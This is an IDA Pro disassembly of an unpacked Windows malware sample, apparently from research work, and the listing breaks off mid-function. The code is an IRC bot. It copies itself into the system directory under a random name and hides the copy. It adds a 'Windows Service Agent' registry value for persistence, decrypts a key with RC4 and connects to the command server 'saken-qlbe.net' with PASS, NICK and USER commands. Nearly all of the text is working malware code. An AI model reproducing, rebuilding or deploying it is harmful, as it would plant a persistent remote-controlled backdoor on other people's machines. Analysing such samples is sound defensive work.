;
; +-------------------------------------------------------------------------+
; | This file is generated by The Interactive Disassembler (IDA) |
; | Copyright (c) 2007 by DataRescue sa/nv, <ida@datarescue.com> |
; | Licensed to: SRI, 1 computer, std, 05/2007 |
; +-------------------------------------------------------------------------+
;
;
; +-------------------------------------------------------------------------+
; | This file is generated by The Interactive Disassembler (IDA) |
; | Copyright (c) 2007 by DataRescue sa/nv, <ida@datarescue.com> |
; | Licensed to: SRI, 1 computer, std, 05/2007 |
; +-------------------------------------------------------------------------+
;
; Input MD5 : 9DD8DB3DA025679AE16DD398AA9F7660
; File Name : u:\work\9dd8db3da025679ae16dd398aa9f7660_unpacked.exe
; Format : Portable executable for 80386 (PE)
; Imagebase : 400000
; Section 1. (virtual address 00001000)
; Virtual size : 0003AB53 ( 240467.)
; Section size in file : 0003AB53 ( 240467.)
; Offset to raw data for section: 00001000
; Flags 60000020: Text Executable Readable
; Alignment : default
; OS type : MS Windows
; Application type: Executable 32bit
unicode macro page,string,zero
irpc c,<string>
db '&c', page
endm
ifnb <zero>
dw zero
endif
endm
.686p
.mmx
.model flat
; ===========================================================================
; Segment type: Pure code
; Segment permissions: Read/Execute
_text segment para public 'CODE' use32
assume cs:_text
;org 401000h
assume es:nothing, ss:nothing, ds:_data, fs:nothing, gs:nothing
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_401000(char *Str)
sub_401000 proc near ; CODE XREF: WinMain(x,x,x,x)+358�p
; sub_4190F6+1E�p
var_4 = dword ptr -4
Str = dword ptr 8
push ebp
mov ebp, esp
push ecx
push ebx
push esi
push edi
mov edi, offset dword_43F050
xor esi, esi
mov ebx, offset aWindowsService ; "Windows Service Agent"
loc_401013: ; CODE XREF: sub_401000+69�j
lea eax, [ebp+var_4]
push esi
push eax
push esi
push 0F003Fh
push esi
push esi
push esi
push dword ptr [edi+4]
push dword ptr [edi]
call dword_4E30AC ; RegCreateKeyExA
cmp [ebp+Str], esi
jz short loc_40104D
push [ebp+Str] ; Str
call _strlen
pop ecx
push eax
push [ebp+Str]
push 1
push esi
push ebx
push [ebp+var_4]
call dword_4E311C ; RegSetValueExA
jmp short loc_401057
; ---------------------------------------------------------------------------
loc_40104D: ; CODE XREF: sub_401000+2F�j
push ebx
push [ebp+var_4]
call dword_4E305C ; RegDeleteValueA
loc_401057: ; CODE XREF: sub_401000+4B�j
push [ebp+var_4]
call dword_4E30D4 ; RegCloseKey
add edi, 8
cmp edi, offset dword_43F068
jb short loc_401013
pop edi
pop esi
pop ebx
leave
retn
sub_401000 endp
; =============== S U B R O U T I N E =======================================
sub_401070 proc near ; CODE XREF: sub_4010AB+56�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov eax, [esp+arg_4]
mov edx, [esp+arg_0]
push esi
or esi, 0FFFFFFFFh
test eax, eax
jz short loc_4010A5
push ebx
push edi
lea edi, [eax]
mov ecx, 0FFh
loc_401089: ; CODE XREF: sub_401070+31�j
mov al, [edx]
mov ebx, esi
and eax, ecx
and ebx, ecx
xor eax, ebx
shr esi, 8
mov eax, ds:dword_43C01C[eax*4]
xor esi, eax
inc edx
dec edi
jnz short loc_401089
pop edi
pop ebx
loc_4010A5: ; CODE XREF: sub_401070+E�j
mov eax, esi
pop esi
not eax
retn
sub_401070 endp
; =============== S U B R O U T I N E =======================================
; int __cdecl sub_4010AB(char *Filename)
sub_4010AB proc near ; CODE XREF: sub_416F62+24A�p
var_10 = dword ptr -10h
Filename = dword ptr 4
push ebx
push esi
xor ebx, ebx
push edi
push ebx ; Mode
call _malloc
mov [esp+10h+var_10], offset dword_43F068
push [esp+10h+Filename] ; Filename
mov esi, eax
call _fopen
mov edi, eax
pop ecx
test edi, edi
pop ecx
jz short loc_4010FA
loc_4010D0: ; CODE XREF: sub_4010AB+4D�j
test byte ptr [edi+0Ch], 10h
jnz short loc_4010FE
inc ebx
push ebx ; NewSize
push esi ; Memory
call _realloc
mov esi, eax
pop ecx
test esi, esi
pop ecx
jz short loc_4010FA
push edi ; File
push 1 ; Count
lea eax, [esi+ebx-1]
push 1 ; ElementSize
push eax ; DstBuf
call sub_41E3E0
add esp, 10h
jmp short loc_4010D0
; ---------------------------------------------------------------------------
loc_4010FA: ; CODE XREF: sub_4010AB+23�j
; sub_4010AB+39�j
xor eax, eax
jmp short loc_401119
; ---------------------------------------------------------------------------
loc_4010FE: ; CODE XREF: sub_4010AB+29�j
dec ebx
push ebx
push esi
call sub_401070
push esi ; Memory
mov ebx, eax
call _free
push edi ; File
call _fclose
add esp, 10h
mov eax, ebx
loc_401119: ; CODE XREF: sub_4010AB+51�j
pop edi
pop esi
pop ebx
retn
sub_4010AB endp
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
sub esp, 240h
push ebx
push esi
lea eax, [ebp-34h]
push edi
xor ebx, ebx
push eax
xor edi, edi
mov byte ptr [ebp-34h], 0Ah
mov byte ptr [ebp-33h], 0Eh
mov byte ptr [ebp-32h], 20h
mov byte ptr [ebp-31h], 48h
mov byte ptr [ebp-30h], 0Bh
mov byte ptr [ebp-2Fh], 2Bh
mov byte ptr [ebp-2Eh], 0Ch
mov byte ptr [ebp-2Dh], 23h
mov byte ptr [ebp-2Ch], 3Ah
mov byte ptr [ebp-2Bh], 27h
mov byte ptr [ebp-2Ah], 28h
mov byte ptr [ebp-29h], 5Eh
mov byte ptr [ebp-28h], 2Ah
mov byte ptr [ebp-27h], 1Eh
mov byte ptr [ebp-26h], 2Dh
mov byte ptr [ebp-25h], 5Ah
mov byte ptr [ebp-24h], 1Bh
mov byte ptr [ebp-23h], 0Fh
mov byte ptr [ebp-22h], 4Ch
mov byte ptr [ebp-21h], 44h
mov byte ptr [ebp-20h], 16h
mov byte ptr [ebp-1Fh], 4
mov byte ptr [ebp-1Eh], 57h
mov byte ptr [ebp-1Dh], 23h
mov byte ptr [ebp-1Ch], 11h
mov byte ptr [ebp-1Bh], 53h
mov byte ptr [ebp-1Ah], 38h
mov byte ptr [ebp-19h], 13h
mov byte ptr [ebp-18h], 0Dh
mov byte ptr [ebp-17h], 12h
mov byte ptr [ebp-16h], 25h
mov byte ptr [ebp-15h], 1Ch
mov byte ptr [ebp-14h], 30h
mov byte ptr [ebp-13h], 12h
mov byte ptr [ebp-12h], 50h
mov byte ptr [ebp-11h], 4Fh
mov byte ptr [ebp-10h], 39h
mov byte ptr [ebp-0Fh], 10h
mov byte ptr [ebp-0Eh], 42h
mov byte ptr [ebp-0Dh], 1Fh
mov byte ptr [ebp-0Ch], 37h
mov byte ptr [ebp-0Bh], 1Dh
mov byte ptr [ebp-0Ah], 41h
mov byte ptr [ebp-9], 55h
mov byte ptr [ebp-8], 2Ch
mov byte ptr [ebp-7], 41h
mov byte ptr [ebp-6], 2Ch
mov byte ptr [ebp-5], 58h
mov [ebp-4], bl
call _strlen
mov esi, 101h
mov [ebp-38h], eax
push esi
lea eax, [ebp-13Ch]
push ebx
push eax
call _memset
push esi
lea eax, [ebp-240h]
push ebx
push eax
call _memset
add esp, 1Ch
xor eax, eax
mov ecx, 100h
loc_401227: ; CODE XREF: .text:00401231�j
mov [ebp+eax-13Ch], al
inc eax
cmp eax, ecx
jb short loc_401227
cmp [ebp+14h], ebx
jz short loc_401256
xor eax, eax
loc_40123A: ; CODE XREF: .text:00401252�j
cmp edi, [ebp+14h]
jnz short loc_401241
xor edi, edi
loc_401241: ; CODE XREF: .text:0040123D�j
mov edx, [ebp+10h]
mov dl, [edi+edx]
inc edi
mov [ebp+eax-240h], dl
inc eax
cmp eax, ecx
jb short loc_40123A
jmp short loc_401270
; ---------------------------------------------------------------------------
loc_401256: ; CODE XREF: .text:00401236�j
xor esi, esi
loc_401258: ; CODE XREF: .text:0040126E�j
cmp edi, [ebp-38h]
jnz short loc_40125F
xor edi, edi
loc_40125F: ; CODE XREF: .text:0040125B�j
mov al, [ebp+edi-34h]
inc edi
mov [ebp+esi-240h], al
inc esi
cmp esi, ecx
jb short loc_401258
loc_401270: ; CODE XREF: .text:00401254�j
mov [ebp+14h], ebx
xor edi, edi
mov eax, 0FFh
loc_40127A: ; CODE XREF: .text:004012B4�j
mov dl, [ebp+edi-13Ch]
mov ebx, [ebp+14h]
mov cl, [ebp+edi-240h]
lea esi, [ebp+edi-13Ch]
add ebx, edx
add ecx, ebx
and ecx, eax
inc edi
mov [ebp+14h], ecx
cmp edi, 100h
mov bl, [ebp+ecx-13Ch]
lea ecx, [ebp+ecx-13Ch]
mov [esi], bl
mov [ecx], dl
jb short loc_40127A
xor edi, edi
cmp [ebp+0Ch], edi
mov [ebp+14h], edi
mov [ebp+10h], edi
jbe short loc_401312
loc_4012C3: ; CODE XREF: .text:00401310�j
inc edi
and edi, eax
mov dl, [ebp+edi-13Ch]
lea ecx, [ebp+edi-13Ch]
mov bl, dl
add ebx, [ebp+14h]
and ebx, eax
mov esi, ebx
mov bl, [ebp+esi-13Ch]
mov [ebp+14h], esi
mov [ecx], bl
lea esi, [ebp+esi-13Ch]
mov ebx, [ebp+10h]
mov [esi], dl
mov cl, [ecx]
mov esi, [ebp+8]
add ecx, edx
and ecx, eax
add esi, ebx
mov cl, [ebp+ecx-13Ch]
xor [esi], cl
inc ebx
cmp ebx, [ebp+0Ch]
mov [ebp+10h], ebx
jb short loc_4012C3
loc_401312: ; CODE XREF: .text:004012C1�j
pop edi
pop esi
pop ebx
leave
retn
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401317 proc near ; DATA XREF: WinMain(x,x,x,x)+14�o
var_268 = dword ptr -268h
var_25C = byte ptr -25Ch
var_158 = byte ptr -158h
var_54 = dword ptr -54h
var_48 = dword ptr -48h
var_28 = dword ptr -28h
var_24 = word ptr -24h
Dst = dword ptr -10h
var_C = dword ptr -0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 25Ch
push ebx
push esi
push edi
push dword_456024
call dword_4E3190 ; closesocket
call sub_40B91F
call dword_4E3050 ; WSACleanup
call dword_4E3050 ; WSACleanup
mov ebx, ds:dword_4F534C
push 64h
call ebx ; Sleep
xor edi, edi
push 10h ; Size
lea eax, [ebp+Dst]
push edi ; Val
push eax ; Dst
call _memset
push 44h
lea eax, [ebp+var_54]
pop esi
push esi ; Size
push edi ; Val
push eax ; Dst
call _memset
add esp, 18h
mov [ebp+var_54], esi
mov esi, 104h
lea eax, [ebp+var_25C]
push esi
push eax
mov [ebp+var_48], offset dword_455290
mov [ebp+var_28], 1
mov [ebp+var_24], di
call ds:dword_4F5348 ; GetSystemDirectoryA
lea eax, [ebp+var_158]
push esi
push eax
push edi
call ds:dword_4F5344 ; GetModuleFileNameA
lea eax, [ebp+Dst]
push eax
lea eax, [ebp+var_54]
push eax
lea eax, [ebp+var_25C]
push eax
push edi
push 28h
push 1
push edi
lea eax, [ebp+var_158]
push edi
push eax
push edi
call ds:dword_4F5340 ; CreateProcessA
test eax, eax
jz short loc_4013DC
push 64h
call ebx ; Sleep
push [ebp+Dst]
mov esi, ds:dword_4F533C
call esi ; CloseHandle
push [ebp+var_C]
call esi ; CloseHandle
loc_4013DC: ; CODE XREF: sub_401317+AF�j
mov eax, [ebp+arg_8]
mov dword ptr [eax+0B0h], offset dword_455288
mov eax, [esp+268h+var_268]
mov large fs:0, eax
add esp, 8
push edi
call ds:dword_4F5338 ; ExitProcess
pop edi
pop esi
pop ebx
loc_4013FF: ; DATA XREF: .data:0043F004�o
jmp $+5
push 0FFFFh
push 539h
call sub_419551
pop ecx
mov dword_4E2E18, eax
pop ecx
retn
sub_401317 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __stdcall WinMain(HINSTANCE hInstance,HINSTANCE hPrevInstance,LPSTR lpCmdLine,int nShowCmd)
_WinMain@16 proc near ; CODE XREF: start+121�p
var_988 = byte ptr -988h
var_884 = byte ptr -884h
var_883 = byte ptr -883h
Filename = byte ptr -6F4h
Str = byte ptr -5F4h
Ext = byte ptr -4F0h
SubStr = byte ptr -3F0h
FullPath = byte ptr -2ECh
Dest = byte ptr -1E8h
var_E4 = dword ptr -0E4h
var_D8 = dword ptr -0D8h
var_B8 = dword ptr -0B8h
var_B4 = word ptr -0B4h
Source = byte ptr -0A0h
Dst = dword ptr -20h
var_1C = dword ptr -1Ch
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
hInstance = dword ptr 8
hPrevInstance = dword ptr 0Ch
lpCmdLine = dword ptr 10h
nShowCmd = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 988h
push ebx
xor ebx, ebx
push esi
push edi
mov [ebp+var_8], ebx
mov [ebp+var_C], ebx
mov [ebp+var_4], offset sub_401317
push [ebp+var_4]
push large dword ptr fs:0
mov large fs:0, esp
mov esi, ds:dword_4F537C
call esi ; GetTickCount
xor edx, edx
mov ecx, 3E8h
div ecx
mov dword_4E2E1C, eax
call esi ; GetTickCount
push eax ; Seed
call _srand
pop ecx
call sub_409DD4
push 2
call dword_4E31A4 ; SetErrorMode
push 7530h
push offset aTrb ; "trb"
push ebx
push ebx
call ds:dword_4F5378 ; CreateMutexA
push eax
call ds:dword_4F5374 ; WaitForSingleObject
cmp eax, 102h
jnz short loc_40149B
push 1
call ds:dword_4F5338 ; ExitProcess
loc_40149B: ; CODE XREF: WinMain(x,x,x,x)+76�j
lea eax, [ebp+var_884]
push eax
push 202h
call dword_4E3068 ; WSAStartup
cmp eax, ebx
jnz loc_4019DE
cmp [ebp+var_884], 2
jnz loc_4019D8
xor eax, eax
mov al, [ebp+var_883]
cmp al, 2
jnz loc_4019D8
mov esi, 104h
lea eax, [ebp+SubStr]
push esi
push eax
call ds:dword_4F5348 ; GetSystemDirectoryA
lea eax, [ebp+FullPath]
push esi
push eax
push ebx
call ds:dword_4F5370 ; GetModuleHandleA
push eax
call ds:dword_4F5344 ; GetModuleFileNameA
lea eax, [ebp+Ext]
push eax ; Ext
lea eax, [ebp+Filename]
push eax ; Filename
push ebx ; Dir
lea eax, [ebp+FullPath]
push ebx ; Drive
push eax ; FullPath
call __splitpath
add esp, 14h
lea eax, [ebp+Ext]
push eax
lea eax, [ebp+Filename]
push eax
push offset aSS ; "%s%s"
lea eax, [ebp+Str]
push esi ; Count
push eax ; Dest
call __snprintf
lea eax, [ebp+SubStr]
push eax ; SubStr
lea eax, [ebp+FullPath]
push eax ; Str
call _strstr
add esp, 1Ch
test eax, eax
jnz loc_401710
cmp dword_43F08C, ebx
mov esi, offset Str ; "nlzhxmpyrjsyle.exe"
jz short loc_401596
push esi ; Str
xor edi, edi
call _strlen
sub eax, 4
pop ecx
jz short loc_401596
loc_401573: ; CODE XREF: WinMain(x,x,x,x)+179�j
call _rand
push 1Ah
cdq
pop ecx
idiv ecx
push esi ; Str
add dl, 61h
mov byte ptr Str[edi], dl ; "nlzhxmpyrjsyle.exe"
inc edi
call _strlen
sub eax, 4
pop ecx
cmp edi, eax
jb short loc_401573
loc_401596: ; CODE XREF: WinMain(x,x,x,x)+148�j
; WinMain(x,x,x,x)+156�j
lea eax, [ebp+SubStr]
push esi
push eax
lea eax, [ebp+Dest]
push offset Format ; "%s\\%s"
push eax ; Dest
call _sprintf
add esp, 10h
lea eax, [ebp+Dest]
push eax
call ds:dword_4F536C ; GetFileAttributesA
cmp eax, 0FFFFFFFFh
jz short loc_4015D6
lea eax, [ebp+Dest]
push 80h
push eax
call ds:dword_4F5368 ; SetFileAttributesA
loc_4015D6: ; CODE XREF: WinMain(x,x,x,x)+1A7�j
mov esi, ds:dword_4F5364
lea eax, [ebp+Dest]
push ebx
push eax
lea eax, [ebp+FullPath]
xor edi, edi
push eax
loc_4015ED: ; CODE XREF: WinMain(x,x,x,x)+209�j
call esi ; CopyFileA
test eax, eax
jnz short loc_401626
call ds:dword_4F5360 ; RtlGetLastWin32Error
cmp edi, ebx
jnz short loc_401626
cmp eax, 20h
jz short loc_401607
cmp eax, 5
jnz short loc_401626
loc_401607: ; CODE XREF: WinMain(x,x,x,x)+1E5�j
push 1
pop edi
push 3A98h
call ds:dword_4F534C ; Sleep
lea eax, [ebp+Dest]
push ebx
push eax
lea eax, [ebp+FullPath]
push eax
jmp short loc_4015ED
; ---------------------------------------------------------------------------
loc_401626: ; CODE XREF: WinMain(x,x,x,x)+1D6�j
; WinMain(x,x,x,x)+1E0�j ...
lea eax, [ebp+Dest]
push eax
call sub_418FAF
pop ecx
lea eax, [ebp+Dest]
push 7
push eax
call ds:dword_4F5368 ; SetFileAttributesA
push 10h ; Size
lea eax, [ebp+Dst]
push ebx ; Val
push eax ; Dst
call _memset
push 44h
lea eax, [ebp+var_E4]
pop esi
push esi ; Size
push ebx ; Val
push eax ; Dst
call _memset
add esp, 18h
mov [ebp+var_E4], esi
mov [ebp+var_D8], offset dword_4E2F94
mov [ebp+var_B4], bx
push 1
pop esi
mov [ebp+var_B8], esi
call ds:dword_4F535C ; GetCurrentProcessId
push eax
push esi
push 100000h
call ds:dword_4F5358 ; OpenProcess
lea ecx, [ebp+FullPath]
push ecx
push eax
lea eax, [ebp+Dest]
push eax
lea eax, [ebp+var_988]
push offset aSDS ; "%s %d \"%s\""
push eax ; Dest
call _sprintf
add esp, 14h
lea eax, [ebp+Dst]
push eax
lea eax, [ebp+var_E4]
push eax
lea eax, [ebp+SubStr]
push eax
push ebx
push 28h
push esi
push ebx
lea eax, [ebp+var_988]
push ebx
push eax
lea eax, [ebp+Dest]
push eax
call ds:dword_4F5340 ; CreateProcessA
test eax, eax
jz short loc_401710
push 0C8h
call ds:dword_4F534C ; Sleep
push [ebp+Dst]
mov esi, ds:dword_4F533C
call esi ; CloseHandle
push [ebp+var_1C]
call esi ; CloseHandle
call dword_4E3050 ; WSACleanup
push ebx
call ds:dword_4F5338 ; ExitProcess
loc_401710: ; CODE XREF: WinMain(x,x,x,x)+137�j
; WinMain(x,x,x,x)+2CB�j
cmp dword_4F351C, 2
jle short loc_40175C
mov eax, dword_4F3520
push dword ptr [eax+4] ; Str
call _atoi
pop ecx
mov esi, eax
push 0FFFFFFFFh
push esi
call ds:dword_4F5374 ; WaitForSingleObject
push esi
call ds:dword_4F533C ; CloseHandle
mov eax, dword_4F3520
cmp [eax+8], ebx
jz short loc_40175C
push 7D0h
call ds:dword_4F534C ; Sleep
mov eax, dword_4F3520
push dword ptr [eax+8]
call ds:dword_4F5354 ; DeleteFileA
loc_40175C: ; CODE XREF: WinMain(x,x,x,x)+2FC�j
; WinMain(x,x,x,x)+326�j
cmp dword_43F090, ebx
jz short loc_401779
cmp dword_4E31C8, ebx
jnz short loc_401779
lea eax, [ebp+Str]
push eax ; Str
call sub_401000
pop ecx
loc_401779: ; CODE XREF: WinMain(x,x,x,x)+347�j
; WinMain(x,x,x,x)+34F�j
lea eax, [ebp+Source]
push offset asc_43FA60 ; "-"
push eax ; Dest
call _sprintf
push ebx ; int
lea eax, [ebp+Source]
push ebx ; int
push eax ; Source
call sub_40B756
lea eax, [ebp+Source]
push eax
call sub_415C3F
push 0B80h ; Size
push ebx ; Val
push offset dword_455298 ; Dst
call _memset
add esp, 24h
lea eax, [ebp+Source]
push offset asc_43FA7C ; "-"
push eax ; Dest
call _sprintf
push ebx ; int
lea eax, [ebp+Source]
push 1 ; int
push eax ; Source
call sub_40B756
add esp, 14h
mov esi, eax
mov edi, ds:dword_4F5350
lea eax, [ebp+var_8]
push eax
push ebx
push ebx
push offset sub_41A8E1
push ebx
push ebx
call edi ; CreateThread
imul esi, 234h
cmp eax, ebx
mov dword_45602C[esi], eax
jnz short loc_40181C
call ds:dword_4F5360 ; RtlGetLastWin32Error
push eax
lea eax, [ebp+Source]
push offset asc_43FAA0 ; "-"
push eax ; Dest
call _sprintf
add esp, 0Ch
loc_40181C: ; CODE XREF: WinMain(x,x,x,x)+3E4�j
lea eax, [ebp+Source]
push eax
call sub_415C3F
push 2
call sub_40B99E
pop ecx
test eax, eax
pop ecx
jnz short loc_4018A1
lea eax, [ebp+Source]
push offset asc_43FAE0 ; "-"
push eax ; Dest
call _sprintf
push ebx ; int
lea eax, [ebp+Source]
push 2 ; int
push eax ; Source
call sub_40B756
add esp, 14h
mov esi, eax
lea eax, [ebp+var_8]
push eax
push ebx
push esi
push offset sub_410C7D
push ebx
push ebx
call edi ; CreateThread
imul esi, 234h
cmp eax, ebx
mov dword_45602C[esi], eax
jnz short loc_401894
call ds:dword_4F5360 ; RtlGetLastWin32Error
push eax
lea eax, [ebp+Source]
push offset asc_43FB0C ; "-"
push eax ; Dest
call _sprintf
add esp, 0Ch
loc_401894: ; CODE XREF: WinMain(x,x,x,x)+45C�j
lea eax, [ebp+Source]
push eax
call sub_415C3F
pop ecx
loc_4018A1: ; CODE XREF: WinMain(x,x,x,x)+418�j
call _rand
push 7Fh ; Count
and eax, 3
push offset Source ; "saken-qlbe.net"
push offset Dest ; Dest
mov dword_4E2F8C, eax
call _strncpy
mov eax, dword_43F06C
push 3Fh ; Count
mov edi, offset byte_4E2EA4
push offset a0 ; "#0#"
push edi ; Dest
mov dword_4E2F74, eax
call _strncpy
push 3Fh ; Count
mov esi, offset byte_4E2EE4
push offset a7lome ; "7lome"
push esi ; Dest
call _strncpy
add esp, 24h
mov dword_4E2F78, ebx
loc_4018F6: ; CODE XREF: WinMain(x,x,x,x)+563�j
; WinMain(x,x,x,x)+56E�j ...
mov [ebp+var_4], ebx
loc_4018F9: ; CODE XREF: WinMain(x,x,x,x)+517�j
push offset dword_4E2E20
mov dword_4E2F88, ebx
call sub_4019E7
cmp eax, 2
mov [ebp+var_10], eax
jz loc_4019D3
cmp dword_4E2F88, ebx
jz short loc_401920
dec [ebp+var_4]
loc_401920: ; CODE XREF: WinMain(x,x,x,x)+500�j
push 0BB8h
call ds:dword_4F534C ; Sleep
inc [ebp+var_4]
cmp [ebp+var_4], 6
jl short loc_4018F9
cmp [ebp+var_10], 2
jz loc_4019D3
cmp [ebp+var_C], ebx
jz short loc_401983
push 7Fh ; Count
push offset Source ; "saken-qlbe.net"
push offset Dest ; Dest
call _strncpy
mov eax, dword_43F06C
push 3Fh ; Count
push offset a0 ; "#0#"
push edi ; Dest
mov dword_4E2F74, eax
call _strncpy
push 3Fh ; Count
push offset a7lome ; "7lome"
push esi ; Dest
call _strncpy
add esp, 24h
mov [ebp+var_C], ebx
jmp loc_4018F6
; ---------------------------------------------------------------------------
loc_401983: ; CODE XREF: WinMain(x,x,x,x)+526�j
cmp byte_43F0E0, bl
jz loc_4018F6
push 7Fh ; Count
push offset byte_43F0E0 ; Source
push offset Dest ; Dest
call _strncpy
mov eax, dword_43F070
push 3Fh ; Count
push offset a1 ; "#1#"
push edi ; Dest
mov dword_4E2F74, eax
call _strncpy
push 3Fh ; Count
push offset a7lome_0 ; "7lome"
push esi ; Dest
call _strncpy
add esp, 24h
mov [ebp+var_C], 1
jmp loc_4018F6
; ---------------------------------------------------------------------------
loc_4019D3: ; CODE XREF: WinMain(x,x,x,x)+4F4�j
; WinMain(x,x,x,x)+51D�j
call sub_40B91F
loc_4019D8: ; CODE XREF: WinMain(x,x,x,x)+A1�j
; WinMain(x,x,x,x)+B1�j
call dword_4E3050 ; WSACleanup
loc_4019DE: ; CODE XREF: WinMain(x,x,x,x)+94�j
pop edi
pop esi
xor eax, eax
pop ebx
leave
retn 10h
_WinMain@16 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4019E7 proc near ; CODE XREF: WinMain(x,x,x,x)+4E9�p
; DATA XREF: sub_401CC7+66AB�o
var_190 = dword ptr -190h
Args = byte ptr -18Ch
var_10C = byte ptr -10Ch
var_CC = byte ptr -0CCh
var_8C = byte ptr -8Ch
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_34 = dword ptr -34h
Dest = byte ptr -2Ch
Dst = word ptr -10h
var_E = word ptr -0Eh
var_C = dword ptr -0Ch
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 190h
mov eax, [ebp+arg_0]
push esi
push edi
push 59h
pop ecx
mov esi, eax
lea edi, [ebp+var_190]
rep movsd
mov dword ptr [eax+160h], 1
loc_401A0C: ; CODE XREF: sub_4019E7+E6�j
; sub_4019E7+136�j ...
push 10h ; Size
lea eax, [ebp+Dst]
push 0 ; Val
push eax ; Dst
call _memset
add esp, 0Ch
mov [ebp+Dst], 2
push [ebp+var_3C]
call dword_4E30F8 ; htons
mov [ebp+var_E], ax
lea eax, [ebp+Args]
push eax
call sub_40AE55
test eax, eax
pop ecx
mov [ebp+var_C], eax
jz loc_401B39
push 1Ch ; Size
lea eax, [ebp+Dest]
push 0 ; Val
push eax ; Dst
call _memset
push 0 ; Str1
lea eax, [ebp+Dest]
push dword_43F0A0 ; int
push dword_43F09C ; int
push eax ; Dest
call sub_40B44F
mov edi, eax
mov eax, [ebp+var_34]
imul eax, 234h
push 1Bh ; Count
add eax, offset byte_456030
push edi ; Source
push eax ; Dest
call _strncpy
add esp, 28h
push 6
push 1
push 2
call dword_4E3178 ; socket
mov esi, eax
mov eax, [ebp+var_34]
imul eax, 234h
push 10h
mov dword_456024[eax], esi
lea eax, [ebp+Dst]
push eax
push esi
call dword_4E30A0 ; connect
cmp eax, 0FFFFFFFFh
jnz short loc_401AD2
push esi
call dword_4E3190 ; closesocket
call sub_40AE7E
push 7D0h
loc_401AC7: ; CODE XREF: sub_4019E7+146�j
call ds:dword_4F534C ; Sleep
jmp loc_401A0C
; ---------------------------------------------------------------------------
loc_401AD2: ; CODE XREF: sub_4019E7+CD�j
lea eax, [ebp+Args]
push eax ; Args
push offset asc_43FB40 ; "-"
call sub_415CB3
push [ebp+var_38]
lea eax, [ebp+Args]
push eax
lea eax, [ebp+var_8C]
push eax
lea eax, [ebp+var_CC]
push [ebp+var_190]
push edi
push eax
lea eax, [ebp+var_10C]
push eax
push esi
call sub_401B4F
add esp, 28h
mov edi, eax
push esi
call dword_4E3190 ; closesocket
test edi, edi
jz loc_401A0C
cmp edi, 1
jnz short loc_401B2F
push 0DBBA0h
jmp short loc_401AC7
; ---------------------------------------------------------------------------
loc_401B2F: ; CODE XREF: sub_4019E7+13F�j
cmp edi, 2
jz short loc_401B3D
jmp loc_401A0C
; ---------------------------------------------------------------------------
loc_401B39: ; CODE XREF: sub_4019E7+5A�j
xor eax, eax
jmp short loc_401B49
; ---------------------------------------------------------------------------
loc_401B3D: ; CODE XREF: sub_4019E7+14B�j
push [ebp+var_34]
call sub_40BA72
pop ecx
push 2
pop eax
loc_401B49: ; CODE XREF: sub_4019E7+154�j
pop edi
pop esi
leave
retn 4
sub_4019E7 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401B4F proc near ; CODE XREF: sub_4019E7+123�p
Dst = byte ptr -1A90h
var_A90 = dword ptr -0A90h
var_2C0 = dword ptr -2C0h
var_140 = dword ptr -140h
Str = byte ptr -0A0h
Dest = byte ptr -20h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
Source = dword ptr 14h
arg_18 = dword ptr 20h
arg_1C = dword ptr 24h
push ebp
mov ebp, esp
mov eax, 1A90h
call __alloca_probe
push ebx
push esi
push edi
xor ebx, ebx
push 3
mov [ebp+var_8], ebx
lea eax, [ebp+var_2C0]
pop ecx
loc_401B6D: ; CODE XREF: sub_401B4F+26�j
mov [eax], bl
add eax, 80h
dec ecx
jnz short loc_401B6D
cmp byte_43F0CC, bl
jz short loc_401B94
push offset byte_43F0CC ; Args
push offset aPassS ; "PASS %s\r\n"
push [ebp+arg_0] ; int
call sub_409CEE
add esp, 0Ch
loc_401B94: ; CODE XREF: sub_401B4F+2E�j
push [ebp+Source]
lea eax, [ebp+Dest]
push ebx ; Str1
push ebx ; int
push 2 ; int
push eax ; Dest
call sub_40B44F
add esp, 10h
push eax
lea eax, [ebp+Str]
push [ebp+Source]
push offset aNickSUserS00S ; "NICK %s\r\nUSER %s 0 0 :%s\r\n"
push eax ; Dest
call _sprintf
add esp, 14h
lea eax, [ebp+Str]
push ebx
push eax ; Str
call _strlen
pop ecx
push eax
lea eax, [ebp+Str]
push eax
push [ebp+arg_0]
call dword_4E3148 ; send
cmp eax, 0FFFFFFFFh
jnz short loc_401BFE
push [ebp+arg_0]
call dword_4E3190 ; closesocket
push 1388h
call ds:dword_4F534C ; Sleep
loc_401BF7: ; CODE XREF: sub_401B4F+D9�j
; sub_401B4F+153�j
xor eax, eax
loc_401BF9: ; CODE XREF: sub_401B4F+173�j
pop edi
pop esi
pop ebx
leave
retn
; ---------------------------------------------------------------------------
loc_401BFE: ; CODE XREF: sub_401B4F+92�j
; sub_401B4F+F8�j ...
mov esi, 1000h
lea eax, [ebp+Dst]
push esi ; Size
push ebx ; Val
push eax ; Dst
call _memset
add esp, 0Ch
lea eax, [ebp+Dst]
push ebx
push esi
push eax
push [ebp+arg_0]
call dword_4E3110 ; recv
test eax, eax
jle short loc_401BF7
lea eax, [ebp+var_A90]
push eax ; int
lea eax, [ebp+Dst]
push eax ; Str
call sub_418C98
pop ecx
cmp eax, ebx
pop ecx
mov [ebp+var_C], eax
mov [ebp+var_4], ebx
jle short loc_401BFE
lea edi, [ebp+var_A90]
loc_401C4F: ; CODE XREF: sub_401B4F+165�j
push 1
pop esi
loc_401C52: ; CODE XREF: sub_401B4F+144�j
push [ebp+arg_1C] ; int
lea eax, [ebp+var_8]
push esi ; File
push eax ; int
lea eax, [ebp+var_140]
push eax ; int
lea eax, [ebp+var_2C0]
push eax ; int
push [ebp+arg_18] ; int
push [ebp+Source] ; Source
push [ebp+arg_8] ; int
push [ebp+arg_4] ; int
push [ebp+arg_0] ; int
push dword ptr [edi] ; Src
call sub_401CC7
